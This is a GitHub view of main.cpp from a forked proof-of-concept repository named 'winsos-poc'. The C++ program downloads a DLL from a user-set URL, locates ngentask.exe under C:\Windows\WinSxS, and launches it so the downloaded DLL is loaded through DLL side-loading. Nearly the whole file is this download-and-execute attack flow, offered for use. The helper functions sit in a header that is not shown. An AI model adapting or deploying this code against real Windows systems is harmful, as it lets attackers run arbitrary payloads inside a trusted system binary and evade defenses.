forked from thiagopeixoto/winsos-poc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.cpp
81 lines (72 loc) · 2.08 KB
/
main.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#include "winsos.h"
constexpr PWCHAR YOUR_URL_HERE = L"http://127.0.0.1:8080/target.dll";
int main(int argc, char *argv[])
{
DisplayHeader();
printf("[+] Downloading DLL...\n");
if (!DownloadFile(YOUR_URL_HERE, DLL_NAME))
{
printf("[x] Failed to download the DLL. Please check if the URL is valid\n");
return EXIT_FAILURE;
}
else
{
printf("\t[-] DLL saved successfully in the current directory\n");
}
printf("[+] Searching for ngentask binary in the WinSxS directory...\n");
std::vector<std::wstring> pathList;
SearchFileRecursive(L"C:\\Windows\\WinSxS", pathList);
if (pathList.empty())
{
printf("[x] Failed to locate the ngentask.exe binary in the WinSxS directory\n");
return EXIT_FAILURE;
}
else
{
for (auto &path : pathList)
{
wprintf(L"\t[-] Found ngentask.exe at %s\n", path.c_str());
}
}
bool is64BitLibrary;
std::wstring fullDllPath = GetDllCurrentFolder() + L"\\" + DLL_NAME;
printf("[+] Checking the architecture of the DLL...\n");
if (!Is64BitLibrary(fullDllPath.c_str(), is64BitLibrary))
{
printf("[x] Unable to identify the architecture of the library. Is it a valid PE file?\n");
return EXIT_FAILURE;
}
else
{
if (is64BitLibrary)
{
printf("\t[-] The DLL is a 64-bit PE file\n");
}
else
{
printf("\t[-] The DLL is a 32-bit PE file\n");
}
}
printf("[+] Ready to execute ngentask.exe\n");
for (auto &path : pathList)
{
if (is64BitLibrary)
{
if (path.find(L"amd64") != std::wstring::npos)
{
ExecuteNgenTask(path.c_str());
break;
}
}
else
{
if (path.find(L"x86") != std::wstring::npos)
{
ExecuteNgenTask(path.c_str());
break;
}
}
}
printf("[+] The DLL has been injected into ngentask.exe via DLL Side-Loading\n");
return EXIT_SUCCESS;
}